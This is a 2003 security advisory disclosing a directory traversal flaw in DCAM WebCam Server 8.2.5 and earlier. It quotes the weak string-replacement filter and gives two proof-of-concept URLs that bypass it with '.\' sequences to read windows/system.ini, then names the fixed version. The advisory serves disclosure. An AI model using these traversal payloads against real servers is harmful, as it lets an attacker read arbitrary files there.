#######################################################################

Luigi Auriemma

Application: DCAM WebCam server
http://www.hyperionx.com
http://sourceforge.net/projects/dcamserver/
Versions: <= 8.2.5
Platforms: Windows
Bug: Directory traversal bug
Risk: high
Exploitation: remote with browser
Date: 22 Dec 2003
Author: Luigi Auriemma
e-mail: aluigi (at) altervista (dot) org [email concealed]
web: http://aluigi.altervista.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

DCAM WebCam Server is an OpenSource program written in VisualBasic that
allows to capture live streaming video and to broadcast it on the web
through the built-in webserver.

#######################################################################

======
2) Bug
======

The webserver built into DCAM uses a protection to avoid the directory
traversal bug.
We can see it in Form1.frm:

...
880 page = Replace(page, "..", "")
881 page = Replace(page, "./", "")
882 page = Replace(page, "/.", "")
883 page = Replace(page, "//", "")
884 page = Replace(page, "\", "")
...

The problem happens when the attacker uses the pattern ".\" that
deceives the checks and allows him to see and download any file in the
remote system knowing the path.

#######################################################################

===========
3) The Code
===========

http://server/.\.\.\.\/windows/system.ini
http://server/.\.\.\.\.\.\.\.\.\.\/windows/system.ini

#######################################################################

======
4) Fix
======

Version 8.2.6

#######################################################################

---
Luigi Auriemma
http://aluigi.altervista.org

[ reply ]